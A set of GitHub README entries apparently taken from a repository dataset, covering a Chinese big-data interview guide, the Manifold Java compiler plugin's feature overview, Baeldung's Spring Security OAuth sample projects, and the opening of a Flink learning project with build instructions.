-[小米大数据开发实习面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据开发岗一面、二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B2%97%E4%B8%80%E9%9D%A2%E3%80%81%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) 
-[小米大数据开发工程师(base北京)已OC](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%88base%E5%8C%97%E4%BA%AC%EF%BC%89%E5%B7%B2OC.pdf) -[小米大数据开发面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据提前批一面二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%8F%90%E5%89%8D%E6%89%B9%E4%B8%80%E9%9D%A2%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据日常实习一二三面(已oc)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%97%A5%E5%B8%B8%E5%AE%9E%E4%B9%A0%E4%B8%80%E4%BA%8C%E4%B8%89%E9%9D%A2%EF%BC%88%E5%B7%B2oc%EF%BC%89.pdf) -[小米大数据日常面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%97%A5%E5%B8%B8%E9%9D%A2%E7%BB%8F.pdf) -[小米大数据研发(已OC)timeline](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%EF%BC%88%E5%B7%B2OC%EF%BC%89timeline.pdf) 
-[小米大数据面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F.pdf) -[小米面经,二面等通知中](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E9%9D%A2%E7%BB%8F%EF%BC%8C%E4%BA%8C%E9%9D%A2%E7%AD%89%E9%80%9A%E7%9F%A5%E4%B8%AD%E3%80%82.pdf) - - - - - - - -大数据&后端书籍 ---- -PDF书籍(含Hadoop、Spark、Flink等大数据书籍)在公众号回复关键字“大数据书籍”或“Java书籍”自行进百度云盘群保存即可 - -## 交流群 -交流群建好了,进群的小伙伴可以加我微信:**MoRan1607,备注:GitHub** -


- -",0 -manifold-systems/manifold,"Manifold is a Java compiler plugin, its features include Metaprogramming, Properties, Extension Methods, Operator Overloading, Templates, a Preprocessor, and more.",2017-06-07T02:37:23Z,,"
- - - -![latest](https://img.shields.io/badge/latest-v2024.1.14-royalblue.svg) -[![slack](https://img.shields.io/badge/slack-manifold-seagreen.svg?logo=slack)](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) -[![GitHub Repo stars](https://img.shields.io/github/stars/manifold-systems/manifold?logo=github&style=flat&color=tan)](https://github.com/manifold-systems/manifold) - ---- - -## What is Manifold? -Manifold is a Java compiler plugin. Use it to supplement your Java projects with highly productive features. - -Advanced compile-time metaprogramming type-safely integrates any kind of data, metadata, or DSL directly into Java. -* [SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) _**(New!)**_ -* [GraphQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql) -* [JSON & JSON Schema](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json), - [YAML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml), - [XML](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml) -* [CSV](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv) -* [JavaScript](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js) -* etc. - - -Powerful **language enhancements** significantly improve developer productivity. 
-* [Extension methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext) -* [_True_ delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation) -* [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props) -* [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple) -* [Operator overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading) -* [Unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions) -* [A *Java* template engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates) -* [A preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor) -* ...and more - -Each feature is available as a separate dependency. Simply add the Manifold dependencies of your choosing to your existing project and begin taking advantage of them. - -All fully supported in JDK LTS releases 8 - 21 + latest with comprehensive IDE support in **IntelliJ IDEA** and **Android Studio**. - -># _**What's New...**_ -> ->[](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) -> ->### [Type-safe SQL](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) -> Manifold SQL lets you write native SQL _directly_ and _type-safely_ in your Java code. ->- Query types are instantly available as you type native SQL of any complexity in your Java code ->- Schema types are automatically derived from your database, providing type-safe CRUD, decoupled TX, and more ->- No ORM, No DSL, No wiring, and No code generation build steps ->

-> [![img_3.png](./docs/images/img_3.png)](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql/readme.md) - -## Who is using Manifold? - -Sampling of companies using Manifold: - - - -## What can you do with Manifold? - -### [Meta-programming](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold) -Use the framework to gain direct, type-safe access to *any* type of resource, such as -[**SQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql), -[**JSON**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json), -[**GraphQL**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql), -[**XML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml), -[**YAML**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml), -[**CSV**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv), and even -other languages such as [**JavaScript**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js). -Remove the code gen step in your build process. [ **▶** Check it out!](http://manifold.systems/images/graphql.mp4) - -[**SQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql) -Use _native_ SQL of any complexity _directly_ and _type-safely_ from Java. -```java -Language english = - ""[.sql/]select * from Language where name = 'English'"".fetchOne(); -Film film = Film.builder(""My Movie"", english) - .withDescription(""Nice movie"") - .withReleaseYear(2023) - .build(); -MyDatabase.commit(); -``` - -[**GraphQL:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql) -Use types defined in .graphql files *directly*, no code gen steps! 
Make GraphQL changes and immediately use them with code completion. -```java -var query = MovieQuery.builder(Action).build(); -var result = query.request(""http://com.example/graphql"").post(); -var actionMovies = result.getMovies(); -for (var movie : actionMovies) { - out.println( - ""Title: "" + movie.getTitle() + ""\n"" + - ""Genre: "" + movie.getGenre() + ""\n"" + - ""Year: "" + movie.getReleaseDate().getYear() + ""\n""); -} -``` - -[**JSON:**](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json) -Use .json schema files directly and type-safely, no code gen steps! Find usages of .json properties in your Java code. -```java -// From User.json -User user = User.builder(""myid"", ""mypassword"", ""Scott"") - .withGender(male) - .withDob(LocalDate.of(1987, 6, 15)) - .build(); -User.request(""http://api.example.com/users"").postOne(user); -``` - -### [Extension Methods](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext) -Add your own methods to existing Java classes, even *String*, *List*, and *File*. Eliminate boilerplate code. -[ **▶** Check it out!](http://manifold.systems/images/ExtensionMethod.mp4) -```java -String greeting = ""hello""; -greeting.myMethod(); // Add your own methods to String! -``` - -### [Delegation](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation) -Favor composition over inheritance. Use `@link` and `@part` for automatic interface implementation forwarding and _true_ delegation. 
-> ```java -> class MyClass implements MyInterface { -> @link MyInterface myInterface; // transfers calls on MyInterface to myInterface -> -> public MyClass(MyInterface myInterface) { -> this.myInterface = myInterface; // dynamically configure behavior -> } -> -> // No need to implement MyInterface here, but you can override myInterface as needed -> } -> ``` - -### [Properties](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props) -Eliminate boilerplate getter/setter code, improve your overall dev experience with properties. -```java -public interface Book { - @var String title; // no more boilerplate code! -} -// refer to it directly by name -book.title = ""Daisy""; // calls setter -String name = book.title; // calls getter -book.title += "" chain""; // calls getter & setter -``` -Additionally, the feature automatically _**infers**_ properties, both from your existing source files and from -compiled classes your project uses. Reduce property use from this: -```java -Actor person = result.getMovie().getLeadingRole().getActor(); -Likes likes = person.getLikes(); -likes.setCount(likes.getCount() + 1); -``` -to this: -```java -result.movie.leadingRole.actor.likes.count++; -``` - -### [Operator Overloading](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#operator-overloading) -Implement *operator* methods on any type to directly support arithmetic, relational, index, and unit operators. -```java -// BigDecimal expressions -if (bigDec1 > bigDec2) { - BigDecimal result = bigDec1 + bigDec2; - ... -} -// Implement operators for any type -MyType value = myType1 + myType2; -``` - -### [Tuple expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple) -Tuple expressions provide concise syntax to group named data items in a lightweight structure. 
-```java -var t = (name: ""Bob"", age: ""35""); -System.out.println(""Name: "" + t.name + "" Age: "" + t.age); - -var t = (person.name, person.age); -System.out.println(""Name: "" + t.name + "" Age: "" + t.age); -``` -You can also use tuples with new [`auto` type inference](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-inference-with-auto) to enable multiple return values from a method. -### [Unit Expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions) -Unit or *binding* operations are unique to the Manifold framework. They provide a powerfully concise syntax and can be -applied to a wide range of applications. -```java -import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc -... -Length distance = 100 mph * 3 hr; -Force f = 5.2 kg m/s/s; // same as 5.2 N -Mass infant = 9 lb + 8.71 oz; -``` - -### [Ranges](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections#ranges) -Easily work with the *Range* API using [unit expressions](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#unit-expressions). -Simply import the *RangeFun* constants to create ranges. -```java -// imports the `to`, `step`, and other ""binding"" constants -import static manifold.collections.api.range.RangeFun.*; -... -for (int i: 1 to 5) { - out.println(i); -} - -for (Mass m: 0kg to 10kg step 22r unit g) { - out.println(m); -} -``` - -### [Science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science) -Use the [manifold-science](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science) -framework to type-safely incorporate units and precise measurements into your applications. -```java -import static manifold.science.util.UnitConstants.*; // kg, m, s, ft, etc. -... 
-Velocity rate = 65mph; -Time time = 1min + 3.7sec; -Length distance = rate * time; -``` - -### [Preprocessor](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor) -Use familiar directives such as **#define** and **#if** to conditionally compile your Java projects. The preprocessor offers -a simple and convenient way to support multiple build targets with a single codebase. [ **▶** Check it out!](http://manifold.systems/images/preprocessor.mp4) -```java -#if JAVA_8_OR_LATER - @Override - public void setTime(LocalDateTime time) {...} -#else - @Override - public void setTime(Calendar time) {...} -#endif -``` - -### [Structural Typing](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#structural-interfaces-via-structural) -Unify disparate APIs. Bridge software components you do not control. Access maps through type-safe interfaces. [ **▶** Check it out!](http://manifold.systems/images/structural%20typing.mp4) -```java -Map map = new HashMap<>(); -MyThingInterface thing = (MyThingInterface) map; // O_o -thing.setFoo(new Foo()); -Foo foo = thing.getFoo(); -out.println(thing.getClass()); // prints ""java.util.HashMap"" -``` - -### [Type-safe Reflection](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext#type-safe-reflection-via-jailbreak) -Access private features with @Jailbreak to avoid the drudgery and vulnerability of Java reflection. [ **▶** Check it out!](http://manifold.systems/images/jailbreak.mp4) -```java -@Jailbreak Foo foo = new Foo(); -// Direct, *type-safe* access to *all* foo's members -foo.privateMethod(x, y, z); -foo.privateField = value; -``` - -### [Checked Exception Handling](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions) -You now have an option to make checked exceptions behave like unchecked exceptions! No more unintended exception -swallowing. 
No more *try*/*catch*/*wrap*/*rethrow* boilerplate! -```java -List strings = ...; -List urls = strings.stream() - .map(URL::new) // No need to handle the MalformedURLException! - .collect(Collectors.toList()); -``` - -### [String Templates](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings) -Inline variables and expressions in String literals, no more clunky string concat! [ **▶** Check it out!](http://manifold.systems/images/string_interpolation.mp4) -```java -int hour = 15; -// Simple variable access with '$' -String result = ""The hour is $hour""; // Yes!!! -// Use expressions with '${}' -result = ""It is ${hour > 12 ? hour-12 : hour} o'clock""; -``` - -### [A *Java* Template Engine](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates) -Author template files with the full expressive power of Java, use your templates directly in your code as types. -Supports type-safe inclusion of other templates, shared layouts, and more. [ **▶** Check it out!](http://manifold.systems/images/mantl.mp4) -```java -List users = ...; -String content = abc.example.UserSample.render(users); -``` -A template file *abc/example/UserSample.html.mtl* -```html -<%@ import java.util.List %> -<%@ import com.example.User %> -<%@ params(List users) %> - - -<% for(User user: users) { %> - <% if(user.getDateOfBirth() != null) { %> - User: ${user.getName()}
- DOB: ${user.getDateOfBirth()}
- <% } %> -<% } %> - - -``` - -## [IDE Support](https://github.com/manifold-systems/manifold) -Use the [Manifold plugin](https://plugins.jetbrains.com/plugin/10057-manifold) to fully leverage -Manifold with **IntelliJ IDEA** and **Android Studio**. The plugin provides comprehensive support for Manifold including code -completion, navigation, usage searching, refactoring, incremental compilation, hotswap debugging, full-featured -template editing, integrated preprocessor, and more. - -

- -[Get the plugin from JetBrains Marketplace](https://plugins.jetbrains.com/plugin/10057-manifold) - -## [Projects](https://github.com/manifold-systems/manifold) -The Manifold project consists of the core Manifold framework and a collection of sub-projects implementing SPIs provided -by the core framework. Each project consists of one or more **dependencies** you can easily add to your project: - -[Manifold : _Core_](https://github.com/manifold-systems/manifold/tree/master/manifold-core-parent/manifold)
- -[Manifold : _Extensions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-ext)
- -[Manifold : _Delegation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-delegation)
- -[Manifold : _Properties_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-props)
- -[Manifold : _Tuples_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-tuple)
- -[Manifold : _SQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-sql)
-[Manifold : _GraphQL_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-graphql)
-[Manifold : _JSON_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-json)
-[Manifold : _XML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-xml)
-[Manifold : _YAML_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-yaml)
-[Manifold : _CSV_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-csv)
-[Manifold : _Property Files_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-properties)
-[Manifold : _Image_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-image)
-[Manifold : _Dark Java_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-darkj)
-[Manifold : _JavaScript_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-js)
- -[Manifold : _Java Templates_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-templates)
- -[Manifold : _String Interpolation_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-strings)
-[Manifold : _(Un)checked Exceptions_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-exceptions)
- -[Manifold : _Preprocessor_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-preprocessor)
- -[Manifold : _Science_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-science)
- -[Manifold : _Collections_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-collections)
-[Manifold : _I/O_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-io)
-[Manifold : _Text_](https://github.com/manifold-systems/manifold/tree/master/manifold-deps-parent/manifold-text)
- ->Experiment with sample projects:
->* [Manifold : _Sample App_](https://github.com/manifold-systems/manifold-sample-project)
->* [Manifold : _Sample SQL App_](https://github.com/manifold-systems/manifold-sql-sample-project)
->* [Manifold : _Sample GraphQL App_](https://github.com/manifold-systems/manifold-sample-graphql-app)
->* [Manifold : _Sample REST API App_](https://github.com/manifold-systems/manifold-sample-rest-api)
->* [Manifold : _Sample Web App_](https://github.com/manifold-systems/manifold-sample-web-app) ->* [Manifold : _Gradle Example Project_](https://github.com/manifold-systems/manifold-simple-gradle-project) ->* [Manifold : _Sample Kotlin App_](https://github.com/manifold-systems/manifold-sample-kotlin-app) - -## Platforms - -Manifold supports: -* Java SE (8 - 21) -* [Android](http://manifold.systems/android.html) -* [Kotlin](http://manifold.systems/kotlin.html) (limited) - -Comprehensive IDE support is also available for IntelliJ IDEA and Android Studio. - -## [Chat](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) -Join our [Slack Group](https://join.slack.com/t/manifold-group/shared_invite/zt-e0bq8xtu-93ASQa~a8qe0KDhOoD6Bgg) to start -a discussion, ask questions, provide feedback, etc. Someone is usually there to help. - -
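The Structural Typing section above casts a plain `HashMap` to an interface. As a conceptual aside (this is *not* Manifold's mechanism; Manifold resolves structural calls at compile time, with no reflection involved), the general idea of viewing a map through an interface can be sketched in plain JDK Java with a dynamic proxy. The `MyThing` interface and `asStructural` helper below are invented for this sketch:

```java
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class MapProxyDemo {
  // A stand-in for MyThingInterface from the example above.
  public interface MyThing {
    void setFoo(String foo);
    String getFoo();
  }

  // Wraps a Map in a proxy that routes getX()/setX(v) calls to map entries.
  @SuppressWarnings("unchecked")
  public static <T> T asStructural(Class<T> iface, Map<String, Object> map) {
    return (T) Proxy.newProxyInstance(
        iface.getClassLoader(), new Class<?>[] { iface },
        (proxy, method, args) -> {
          String name = method.getName();
          if (name.startsWith("set") && args != null && args.length == 1) {
            map.put(name.substring(3), args[0]); // setFoo -> key "Foo"
            return null;
          }
          if (name.startsWith("get") && (args == null || args.length == 0)) {
            return map.get(name.substring(3)); // getFoo -> key "Foo"
          }
          throw new UnsupportedOperationException(name);
        });
  }

  public static void main(String[] args) {
    Map<String, Object> map = new HashMap<>();
    MyThing thing = asStructural(MyThing.class, map);
    thing.setFoo("bar");
    System.out.println(thing.getFoo()); // prints "bar"
  }
}
```

Unlike this runtime proxy, Manifold implements structural assignability at compile time, which is why the casted `HashMap` in the example above still reports its real class.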
-",0
-Baeldung/spring-security-oauth,"Just Announced - Learn Spring Security OAuth",2016-03-02T09:04:07Z,,"## Spring Security OAuth
-
-I've just announced a new course, dedicated to exploring the new OAuth2 stack in Spring Security 5 - Learn Spring Security OAuth:
-http://bit.ly/github-lsso
-


- - - -## Build the Project -``` -mvn clean install -``` - - - -## Projects/Modules -This project contains a number of modules, here is a quick description of what each module contains: -- `oauth-rest` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack -- `oauth-jwt` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack, focused on JWT support -- `oauth-jws-jwk-legacy` - Authorization Server and Resource Server for JWS + JWK in a Spring Security OAuth2 Application -- `oauth-legacy` - Authorization Server, Resource Server, Angular and AngularJS Apps for legacy Spring Security OAuth2 - - - -## Run the Modules -You can run any sub-module using command line: -``` -mvn spring-boot:run -``` - -If you're using Spring STS, you can also import them and run them directly, via the Boot Dashboard - -You can then access the UI application - for example the module using the Password Grant - like this: -`http://localhost:8084/` - -You can login using these credentials, username:john and password:123 - -## Run the Angular 7 Modules - -- To run any of Angular7 front-end modules (_spring-security-oauth-ui-implicit-angular_ , _spring-security-oauth-ui-password-angular_ and _oauth-ui-authorization-code-angular_) , we need to build the app first: -``` -mvn clean install -``` - -- Then we need to navigate to our Angular app directory: -``` -cd src/main/resources -``` - -And run the command to download the dependencies: -``` -npm install -``` - -- Finally, we will start our app: -``` -npm start -``` -- Note: Angular7 modules are commented out because these don't build on Jenkins as they need npm installed, but they build properly locally -- Note for Angular version < 4.3.0: You should comment out the HttpClient and HttpClientModule import in app.module and app.service.ts. These version rely on the HttpModule. 
-
-## Using the JS-only SPA OAuth Client
-The main purpose of these projects is to analyze how OAuth should be carried out on JavaScript-only Single-Page Applications, using the authorization_code flow with PKCE.
-
-The *clients-SPA-legacy/clients-js-only-react-legacy* project includes a very simple Spring Boot Application serving a couple of separate Single-Page-Applications developed in React.
-
-It includes three pages:
- * a 'Step-By-Step' guide, where we analyze explicitly each step that we need to carry out to obtain an access token and request a secured resource
- * a 'Real Case' scenario, where we can log in, and obtain or use secured endpoints (provided by the Auth server and by a Custom server we set up)
- * the Article's Example Page, with the exact same code that is shown in the related article
-
-The Step-By-Step guide supports using different providers (Authorization Servers) by just adding (or uncommenting) the corresponding entries in the static/*spa*/js/configs.js file.
-
-### The 'Step-by-Step' OAuth Client with PKCE page
-After running the Spring Boot Application (a simple *mvn spring-boot:run* command will be enough), we can browse to *http://localhost:8080/pkce-stepbystep/index.html* and follow the steps to find out what it takes to obtain an access token using the Authorization Code with PKCE flow.
-
-When prompted with the login form, we might need to create a user for our Application first.
-
-### The 'Real-Case' OAuth Client with PKCE page
-To use all the features contained in the *http://localhost:8080/pkce-realcase/index.html* page, we first need to start the resource server (clients-SPA-legacy/oauth-resource-server-auth0-legacy).
-
-On this page, we can:
- * List the resources in our resource server (public, no permissions needed)
- * Add resources (we're asked for the permissions to do that when logging in.
For simplicity's sake, we just request the existing 'profile' scope)
- * Remove resources (we actually can't accomplish this task, because the resource server requires the application to have permissions that were not included in the existing scopes)
-
-",0
-zhisheng17/flink-learning,flink learning blog. http://www.54tianzhisheng.cn/ 含 Flink 入门、概念、原理、实战、性能调优、源码解析等内容。涉及 Flink Connector、Metrics、Library、DataStream API、Table API & SQL 等内容的学习案例,还有 Flink 落地应用的大型项目案例(PVUV、日志存储、百亿数据实时去重、监控告警)分享。欢迎大家支持我的专栏《大数据实时计算引擎 Flink 实战与性能优化》,2019-01-01T07:38:28Z,,"# Flink Learning
-
-If you're passing by, please give this project a star. Writing this much was no small effort, and a star is real encouragement to keep going! Special thanks also to [JetBrains](https://jb.gg/OpenSourceSupport) for providing a free license of their full product pack, 🙏🙏🙏!
-
-![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-05-25-124027.jpg)
-
-## Stargazers over time
-
-![Stargazers over time](https://starchart.cc/zhisheng17/flink-learning.svg)
-
-## Project Structure
-
-![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/2020-01-11-064410.png)
-
-
-## How to build
-
-You may need to add the Aliyun central mirror to the `mirrors` section of your Maven `settings.xml`:
-
-```xml
-<mirror>
-  <id>alimaven</id>
-  <mirrorOf>central</mirrorOf>
-  <name>aliyun maven</name>
-  <url>https://maven.aliyun.com/repository/central</url>
-</mirror>
-```
-
-Then run the following command:
-
-```
-mvn clean package -Dmaven.test.skip=true
-```
-
-You should see the following result if the build succeeds.
- -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-09-27-121923.jpg) - -## Flink 系统专栏 - -基于 Flink 1.9 讲解的专栏,涉及入门、概念、原理、实战、性能调优、系统案例的讲解。扫码下面专栏二维码可以订阅该专栏 - -![](http://zhisheng-blog.oss-cn-hangzhou.aliyuncs.com/img/2019-11-05-044731.jpg) - -首发地址:[http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/](http://www.54tianzhisheng.cn/2019/11/15/flink-in-action/) - -专栏地址:[https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f](https://gitbook.cn/gitchat/column/5dad4a20669f843a1a37cb4f) - - - -## Change - -**2022/02/26** 将自己 《Flink 实战与性能优化》专栏放在 GitHub,参见 books 目录 - -**2021/12/18** 将该项目的 Flink 版本升级至 1.14.2,如果有需要可以去老的分支查看。 - -**2021/08/15** 将该项目的 Flink 版本升级至 1.13.2,API 发生重大改变,所以代码结构也做了相应的调整(部分代码在 master 分支已经删除,同时将之前的代码切到 [feature/flink-1.10.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.10.0) 上了,如果有需要可以去老的分支查看)。 - -**2020/02/16** 将该项目的 Flink 版本升级至 1.10,该版本代码都是经过测试成功运行的,尽量以该版本作为参考,如果代码在你们集群测试不成功,麻烦检查 Flink 版本是否一致,或者是否有包冲突问题。 - -**2019/09/06** 将该项目的 Flink 版本升级到 1.9.0,有一些变动,Flink 1.8.0 版本的代码经群里讨论保存在分支 [feature/flink-1.8.0](https://github.com/zhisheng17/flink-learning/tree/feature/flink-1.8.0) 以便部分同学需要。 - -**2019/06/08** 四本 Flink 书籍: - -+ [Introduction_to_Apache_Flink_book.pdf]() 这本书比较薄,处于介绍阶段,国内有这本的翻译书籍 - -+ [Learning Apache Flink.pdf]() 这本书比较基础,初学的话可以多看看 - -+ [Stream Processing with Apache Flink.pdf]() 这本书是 Flink PMC 写的 - -+ [Streaming System.pdf]() 这本书评价不是一般的高 - -**2019/06/09** 新增流处理引擎相关的 Paper,在 paper 目录下: - -+ [流处理引擎相关的 Paper](./paper/paper.md) - -**【提示】**:关于书籍的下载,因版权问题,不方便提供,所以已经删除,需要的话可以切换到老分支去下载。 - -## 博客 - -1、[Flink 从0到1学习 —— Apache Flink 介绍](http://www.54tianzhisheng.cn/2018/10/13/flink-introduction/) - -2、[Flink 从0到1学习 —— Mac 上搭建 Flink 1.6.0 